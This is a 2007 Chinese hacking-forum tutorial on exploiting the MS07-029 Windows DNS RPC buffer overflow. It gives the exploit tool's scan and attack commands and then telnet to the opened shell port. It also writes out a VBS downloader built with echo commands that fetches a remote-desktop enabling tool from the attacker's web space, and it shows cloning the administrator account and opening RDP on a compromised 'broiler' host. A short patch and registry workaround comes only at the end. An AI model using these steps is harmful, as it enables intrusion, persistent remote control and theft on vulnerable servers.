MS07-029--入侵之路微软难忘之伤__〓华西安全联盟〓黑客教程黑客软件安全文献 —

MS07-029--入侵之路微软难忘之伤

www.hx99.org 阅读: 时间:2007-12-16 整理:华西黑盟
------------------------------------------------------------------

前言：
MS07-029，Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁，开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。今天，就让我带领各路英豪，踏上DNS EXP之路。
我们先来看看所用工具的界面：

这就是传说中的利用工具，可以通杀2000SEVER，2003SEVER系统，另外还具备了扫描功能！
先用它来对主机进行扫描：
在我们的命令行下输入：“dns –s 目标IP地址”

稍等片刻，开放的端口以及操作系统以出现在我们面前，如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你，你马上就会成功得到这台主机的权限了
上图意思就是1029端口存在漏洞。
现在我们来最关键的步骤――溢出：
在命令行内输入
dns -2003chs *.*.93.189 1029
其中-2003ch的意思是操作系统的型号，-2003chs即简体中文版的2003系统，
如果是2000的系统就使用“-2000all”参数，*.*.93.189就是我们的目标IP地址，1029就是刚才扫描出存在漏洞的端口”。

出现“Attack sent ,check port 1100”字样，说明已经打开了目标地址的1100端口，我们TELNET上去：TELNET *.*.93.189 1100

我们现在已经成功的入侵了对方的电脑，并且得到了管理员的权限。
下面我给大家介绍一下如何在肉鸡上面开3389，
在命令行里输入
@echo with wscript:if .arguments.count^<2 then .quit:end if > tony.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> tony.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs
大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs

然后把开3389的工具上传到你的个人空间,
我这里用的是火狐开3389的工具，在命令行里输入
cscript tony.vbs http://你空间地址/wrsky.exe c:\wrsky.exe

“wrsky.exe -c”可以克隆当前管理员帐号
再输入“c:\wrsky.exe -o 3551”

意思就是打开对方的远程桌面服务，并且使用3551端口。
用“wrsky.exe -k”可以检查3389是否开启，开启以后输入“wrsky.exe -r”,对方的电脑就自动重启以后就可以连接上去了。
在运行里输入"mstsc",登陆上去。

Click here to open new window
CTRL+Mouse wheel to zoom in/out

Click here to open new window
CTRL+Mouse wheel to zoom in/out

那熟悉而又亲切的画面出现在我们面前了。
如果是2K的系统，还有一个更加傻瓜化的工具open3389，直接运行就可以了，不需要任何参数，不过对方电脑会马上重启。
另外我还放了其他两个DNS利用工具和一篇ZWELL的精华文章在光盘里，有兴趣的朋友可以自己研究。

这个漏洞的危害是是分巨大的，目前利用DNS服务RPC漏洞传播的蠕虫病毒VanBot已经出现，变种已经开始疯狂传播。
WIN 2K或2003的朋友请赶快下载补丁
http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx
或者打开记事本，输入：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters]
"RpcProtocol"=dword:00000004
保存为扩展名为 .REG 的文件，双击导入，再重新启动 DNS 服务即可。
最后谢谢职业欠钱兄弟和俺可爱的GF对此文的帮助。

【免费加入会员】【我要投稿】【关闭本页】

-------------------------------------------------------------------------------------------
上一篇：CCProxy Telnet Proxy Ping远程栈溢出分析下一篇：渗透测试介绍
-------------------------------------------------------------------------------------------
用户名：
Email：
评论内容：